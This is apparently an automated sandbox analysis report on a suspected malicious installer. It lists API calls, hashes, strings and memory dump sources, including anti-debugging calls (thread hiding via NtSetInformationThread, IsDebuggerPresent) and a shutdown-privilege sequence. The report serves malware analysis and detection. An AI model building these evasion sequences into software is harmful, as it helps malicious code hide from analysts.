                          • Instruction ID: 62079b394e844b99edfe34681a54e6a771f9acf06b0e0edf3831e4febe4f0fcd
                          • Opcode Fuzzy Hash: ee163927ca17778f4c6db58f85af789f42985c59086641f9e05af506b5860873
                          • Instruction Fuzzy Hash: 4A51BD31504B018FC3308F2CC990799B7E3BFD6314F698E5DC0AA5BA95DB70B94A8B91
                          APIs
                          • GetCurrentThread.KERNEL32 ref: 6C893E9D
                          • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C893EAA
                          Memory Dump Source and Joe Sandbox IDA Plugin snapshot: identical to the first record above (process 6, module base 6C890000).
                          Similarity
                          • API ID: Thread$CurrentInformation
                          • String ID:
                          • API String ID: 1650627709-0
                          • Opcode ID: 575a2fd9e11937e64b90a62ef8748b877a6495034004fbcf2928ead369814d9b
                          • Instruction ID: 45d4a5f2c09683d5c124bb27b30213024bc22ca1594ed1987e9bb1e52df2b970
                          • Opcode Fuzzy Hash: 575a2fd9e11937e64b90a62ef8748b877a6495034004fbcf2928ead369814d9b
                          • Instruction Fuzzy Hash: 7031E131545B058FC330CF28C9947C6B7B3AFE6314F698E1DC0AA5BA91DB7478099B51
                          APIs
                          • GetCurrentThread.KERNEL32 ref: 6C893E9D
                          • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C893EAA
                          Memory Dump Source and Joe Sandbox IDA Plugin snapshot: identical to the first record above (process 6, module base 6C890000).
                          Similarity
                          • API ID: Thread$CurrentInformation
                          • String ID:
                          • API String ID: 1650627709-0
                          • Opcode ID: 76c6aecf6bf4e28f7ac591108543c2ef2fadd3a509ac6b436696c77da6b9633c
                          • Instruction ID: 03641d45a07ba9acd8e9e6f2faaccf57322eeeb9cfde8bb65c22b9eafbbff6b1
                          • Opcode Fuzzy Hash: 76c6aecf6bf4e28f7ac591108543c2ef2fadd3a509ac6b436696c77da6b9633c
                          • Instruction Fuzzy Hash: AC31EF31104B058FC734CF2CC994796B7B2AF96308F694E5DC0AA5BA91DB71B8458B92
                          APIs
                          • GetCurrentThread.KERNEL32 ref: 6C893E9D
                          • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C893EAA
                          Memory Dump Source and Joe Sandbox IDA Plugin snapshot: identical to the first record above (process 6, module base 6C890000).
                          Similarity
                          • API ID: Thread$CurrentInformation
                          • String ID:
                          • API String ID: 1650627709-0
                          • Opcode ID: ad19e763d4760e3a7a4fea5623e53f4aca2cbab9628b19c245911588d533cf5e
                          • Instruction ID: 8f4268ad3b4928bce07b797426db966bcb338bbf0f322179d39d4c98d9495bb7
                          • Opcode Fuzzy Hash: ad19e763d4760e3a7a4fea5623e53f4aca2cbab9628b19c245911588d533cf5e
                          • Instruction Fuzzy Hash: 8A21F430118B058FD334CF2CC9A479A77B2AF97305F644E1DD0BB8BA91DB74A8048B52
                          APIs
                          • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6CA13F40
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmp
                          Similarity
                          • API ID: ManagerOpen
                          • String ID:
                          • API String ID: 1889721586-0
                          Strings
                          Similarity
                          • API ID:
                          • String ID: "OP$#OP$#OP$+duH$+duH$/+p8$/+p8$H$J\$J\$P$Rr!A$Sr!A$Sr!A$p
                          • API String ID: 0-2001680094

                          Control-flow Graph

                          Strings
                          Similarity
                          • API ID:
                          • String ID: 8Q
                          • API String ID: 0-4022487301

                          Control-flow Graph

                          APIs
                            • Part of subcall function 6CA33277: CreateFileW.KERNEL32(00000000,00000000,?,6CA32F35,?,?,00000000,?,6CA32F35,00000000,0000000C), ref: 6CA33294
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA32FA0
                          • __dosmaperr.LIBCMT ref: 6CA32FA7
                          • GetFileType.KERNEL32(00000000), ref: 6CA32FB3
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA32FBD
                          • __dosmaperr.LIBCMT ref: 6CA32FC6
                          • CloseHandle.KERNEL32(00000000), ref: 6CA32FE6
                          • CloseHandle.KERNEL32(6CA29EF0), ref: 6CA33133
                          • GetLastError.KERNEL32 ref: 6CA33165
                          • __dosmaperr.LIBCMT ref: 6CA3316C
                          Strings
                          Similarity
                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                          • String ID: 8Q
                          • API String ID: 4237864984-4022487301

                          Control-flow Graph

                          Strings
                          Similarity
                          • API ID:
                          • String ID: 1:x$1:x$wtU'$xtU'$xtU'
                          • API String ID: 0-2932700092
                          Strings
                          Similarity
                          • API ID:
                          • String ID: ;T55
                          • API String ID: 0-2572755013

                          Control-flow Graph

                          APIs
                          Strings
                          Similarity
                          • API ID: CloseHandle$CreateObjectProcessSingleWait
                          • String ID: D
                          • API String ID: 2059082233-2746444292

                          Control-flow Graph

                          APIs
                            • Part of subcall function 6CA2ACD1: GetConsoleCP.KERNEL32(?,6CA29EF0,?), ref: 6CA2AD19
                          • WriteFile.KERNEL32(?,?,6CA3350C,00000000,00000000,?,00000000,00000000,6CA348D6,00000000,00000000,?,00000000,6CA29EF0,6CA3350C,00000000), ref: 6CA2ABCF
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CA3350C,6CA29EF0,00000000,?,?,?,?,00000000,?), ref: 6CA2ABD9
                          • __dosmaperr.LIBCMT ref: 6CA2AC1E
                          Strings
                          Similarity
                          • API ID: ConsoleErrorFileLastWrite__dosmaperr
                          • String ID: 8Q
                          • API String ID: 251514795-4022487301

                          Control-flow Graph

                          APIs
                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CA14B51
                          Strings
                          Similarity
                          • API ID: Ios_base_dtorstd::ios_base::_
                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                          • API String ID: 323602529-1866435925

                          Control-flow Graph

                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 363486ce8dc00c4ff8b46265c78e2189b8ae2eb7ff9f77791ea1df2392805670
                          • Instruction ID: 1b70abf49470caba8bf1bcec82b4e60786ccacc478f26ef6c14befd3e0770282
                          • Opcode Fuzzy Hash: 363486ce8dc00c4ff8b46265c78e2189b8ae2eb7ff9f77791ea1df2392805670
                          • Instruction Fuzzy Hash: 517168B0208305AFD701DF18C480B9FBBE8BF99714F50592EF5E9C6A50D775D8988B92

                          Control-flow Graph

                          control_flow_graph 4796 6ca2a745-6ca2a759 call 6ca303c2 4799 6ca2a75b-6ca2a75d 4796->4799 4800 6ca2a75f-6ca2a767 4796->4800 4801 6ca2a7ad-6ca2a7cd call 6ca3053f 4799->4801 4802 6ca2a772-6ca2a775 4800->4802 4803 6ca2a769-6ca2a770 4800->4803 4811 6ca2a7db 4801->4811 4812 6ca2a7cf-6ca2a7d9 call 6ca1e812 4801->4812 4806 6ca2a793-6ca2a7a3 call 6ca303c2 CloseHandle 4802->4806 4807 6ca2a777-6ca2a77b 4802->4807 4803->4802 4805 6ca2a77d-6ca2a791 call 6ca303c2 * 2 4803->4805 4805->4799 4805->4806 4806->4799 4818 6ca2a7a5-6ca2a7ab GetLastError 4806->4818 4807->4805 4807->4806 4816 6ca2a7dd-6ca2a7e0 4811->4816 4812->4816 4818->4801
                          APIs
                          • CloseHandle.KERNEL32(00000000,?,00000000,?,6CA3307F), ref: 6CA2A79B
                          • GetLastError.KERNEL32(?,00000000,?,6CA3307F), ref: 6CA2A7A5
                          • __dosmaperr.LIBCMT ref: 6CA2A7D0
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: CloseErrorHandleLast__dosmaperr
                          • String ID:
                          • API String ID: 2583163307-0
                          • Opcode ID: 13ab672725871e31031d216d5f14a7823350c77f8f5bbeadb49320e0c8e94b76
                          • Instruction ID: 73d2ddc2bcfdc226862ee8eb865de46d0180015508052e350223f2468efaeed0
                          • Opcode Fuzzy Hash: 13ab672725871e31031d216d5f14a7823350c77f8f5bbeadb49320e0c8e94b76
                          • Instruction Fuzzy Hash: 8B0148327092701BC305563899847AD67764BC373CF2D8359E958CBEC2DF288CC95294
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID: 8Q
                          • API String ID: 0-4022487301
                          • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                          • Instruction ID: ca340ee3964242e506c121e3ff279eb20985ea753d539feebba32160afea963d
                          • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                          • Instruction Fuzzy Hash: 8DF0D13250A6681AD7211A7DCE00BCA32E98F4233CF280719E82593EC0CB38D58E86A1
                          APIs
                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CA148D4
                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CA14914
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: Ios_base_dtorstd::ios_base::_
                          • String ID:
                          • API String ID: 323602529-0
                          • Opcode ID: 9d1cdc8734747235ecaf6f1f9bac52c3d23a66a927a6ef6774410bf1463a7ab4
                          • Instruction ID: 7b3e1abdbf911b12eb8d820ade90dac90e54709f59f58685946500640334603f
                          • Opcode Fuzzy Hash: 9d1cdc8734747235ecaf6f1f9bac52c3d23a66a927a6ef6774410bf1463a7ab4
                          • Instruction Fuzzy Hash: 06515871505B40DBE725CF29C995BD2BBF4BB04718F448A1CD4AA8BB91DB30F989CB80
                          APIs
                          • GetLastError.KERNEL32(6CA44DD8,0000000C), ref: 6CA1DD72
                          • ExitThread.KERNEL32 ref: 6CA1DD79
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: ErrorExitLastThread
                          • String ID:
                          • API String ID: 1611280651-0
                          • Opcode ID: b3774f260301a9213cdea0cd5fbf687246edd05bab43dc9de5b78ab5bf37fe39
                          • Instruction ID: e7fe67ea74b2afa9dd82354402275c063a9d9de19c2988e6cb641b52dd2f51a3
                          • Opcode Fuzzy Hash: b3774f260301a9213cdea0cd5fbf687246edd05bab43dc9de5b78ab5bf37fe39
                          • Instruction Fuzzy Hash: A2F0C2B1A14615AFDB05AFB0C50CAAE3B74FF41218F188689E002D7F40CB35598ACB60
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: __wsopen_s
                          • String ID:
                          • API String ID: 3347428461-0
                          • Opcode ID: c7685b759b0f2b14c23f2522d113ccae23299c7094196e9f119574927c90a7b6
                          • Instruction ID: 32879a744f8e3f295c2e007dec9056bc4917024ee41f733b798f31f14c4317ea
                          • Opcode Fuzzy Hash: c7685b759b0f2b14c23f2522d113ccae23299c7094196e9f119574927c90a7b6
                          • Instruction Fuzzy Hash: 55116A71A0420AAFCF09CF58EA4499F3BF8EF48308F084059F808EB301D634E915CBA8
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: _free
                          • String ID:
                          • API String ID: 269201875-0
                          • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                          • Instruction ID: 79b5b636a6c1575e4bffdb7c18c4abc9e60cb9cd521903b61e847e1a5d743716
                          • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                          • Instruction Fuzzy Hash: 94014472C0116DAFCF019FA88D019EE7FB5AF08214F244265F958E2591E7318AA9DBD1
                          APIs
                          • CreateFileW.KERNEL32(00000000,00000000,?,6CA32F35,?,?,00000000,?,6CA32F35,00000000,0000000C), ref: 6CA33294
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: a83bfcb49aad63366743916ba85e053ad08510091e42bb618ab18dc72d95f219
                          • Instruction ID: ad368674df02199317933126d00a30b39a85887d18b6b6b08eec2cee959e145c
                          • Opcode Fuzzy Hash: a83bfcb49aad63366743916ba85e053ad08510091e42bb618ab18dc72d95f219
                          • Instruction Fuzzy Hash: 82D06C3210020EBBDF029E84DC06EDA3BAAFB48714F018100BA5896020C732E862EB90
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                          • Instruction ID: e8b777c3ed181bf43417fab8e2cbe5cdc6a9807d095a35c8a671274109f35311
                          • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                          • Instruction Fuzzy Hash:
                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 6CA14B8A
                          • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6CA14B96
                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6CA14BA4
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6CA14BCB
                          • NtInitiatePowerAction.NTDLL ref: 6CA14BDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                          • String ID: SeShutdownPrivilege
                          • API String ID: 3256374457-3733053543
                          • Opcode ID: bd1bcd8e6dd6c0cdcc3a4b198c4be53fbf3a4a27fca808764331e6cafec3234b
                          • Instruction ID: a64294a35082750b0b9f56d46d329c09115d160661ecd60da18c8eab1e060331
                          • Opcode Fuzzy Hash: bd1bcd8e6dd6c0cdcc3a4b198c4be53fbf3a4a27fca808764331e6cafec3234b
                          • Instruction Fuzzy Hash: F9F03AB1644300AFEA10AF24DD0FB5A7BB8EB46701F004918F985AB1D1E7B069948BA3
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID: \j`7$\j`7$j
                          • API String ID: 0-3644614255
                          • Opcode ID: ee88b33770937f12b243847e177fe714984f8dcce0fa1936057e349f20285d1c
                          • Instruction ID: eb707a0b4fecad0f56f6ec8b66ea45dda72eb80e8aababf3fe375902608c2d58
                          • Opcode Fuzzy Hash: ee88b33770937f12b243847e177fe714984f8dcce0fa1936057e349f20285d1c
                          • Instruction Fuzzy Hash: 8142327460D3828FCB25CF68C58066ABBE1ABCA354F544E2EE499CB761D334E845CB53
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: _strlen
                          • String ID:
                          • API String ID: 4218353326-0
                          • Opcode ID: cec7bbe62d69ab6d588e991837682d9c4156be5c933b1d2306c1cd643573d5f8
                          • Instruction ID: 6d8dbb37a09f58885ff67c1ad533795109f662c8ae901ce6ef8f865aa9ecfee6
                          • Opcode Fuzzy Hash: cec7bbe62d69ab6d588e991837682d9c4156be5c933b1d2306c1cd643573d5f8
                          • Instruction Fuzzy Hash: FE53B071649B018FC728CF28C8D0AA5B7E2EF9531871D8A2DC1D68BE55E774B58ACB40
                          APIs
                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CA1F099
                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CA1F0A3
                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CA1F0B0
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                          • String ID:
                          • API String ID: 3906539128-0
                          • Opcode ID: e00939f61f8b5b292e3bb661b45c74f08cd5b69c63ff9edc4540b499fc78792b
                          • Instruction ID: 867e48003253d9fdf90aacd88e63da47def76e0b7691b6c0a927efea1a524de5
                          • Opcode Fuzzy Hash: e00939f61f8b5b292e3bb661b45c74f08cd5b69c63ff9edc4540b499fc78792b
                          • Instruction Fuzzy Hash: D231C4749052189BCB21DF65D9887CDBBB8BF08354F5042DAE41CA7650EB749BC58F44
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,?,6CA1E055,6CA18A69,00000003,00000000,6CA18A69,00000000), ref: 6CA1DFBF
                          • TerminateProcess.KERNEL32(00000000,?,6CA1E055,6CA18A69,00000003,00000000,6CA18A69,00000000), ref: 6CA1DFC6
                          • ExitProcess.KERNEL32 ref: 6CA1DFD8
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: Process$CurrentExitTerminate
                          • String ID:
                          • API String ID: 1703294689-0
                          • Opcode ID: 8fe439ec96dfa39ee4d709379168604a75f2081ac48d3e5698b370bb498cc010
                          • Instruction ID: b31a0d10b8c4181cc05f882945840d342d2f107ff0a50b46ebd22306dc92b265
